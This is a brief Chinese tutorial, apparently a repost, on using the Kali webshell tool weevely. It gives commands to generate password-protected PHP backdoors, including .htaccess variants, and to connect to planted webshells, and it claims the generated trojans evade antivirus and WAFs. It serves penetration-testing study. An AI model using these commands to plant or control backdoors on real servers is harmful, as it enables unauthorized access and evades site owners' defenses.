weevely是一款Kali下使用python编写的webshell管理工具,可以当作是linux下的一款菜刀的替代工具(仅限于php)。使用weevely生成的木马免杀能力较强,而且使用加密连接,往往能轻松突破WAF拦截。
二、简单使用
终端输入weevely启动,可以看到帮助说明
连接一句话木马 weevely <URL> <password> [cmd]
如:weevely http://www.xxx.com/test.php test test为连接密码加载session文件 weevely session <path> [cmd]
用来连接曾经连接过的会话生成后门代理: weevely generate <password> <path>
如:weevely generate test /root/Desktop/test.php 桌面生成php后门,连接密码为test
另外还可以生成*.img、*.htaccess,但需要服务器开启.htaccess。
友情提醒:该教程仅用于渗透研究,切勿进行非法测试
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650457537&idx=3&sn=c3d9575cea36308ad508f345dfd17f43&chksm=83bba025b4cc2933a71e065ae2d7768cd6230a0a4727981fbb2e72fa99b055c1731f660c2362#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh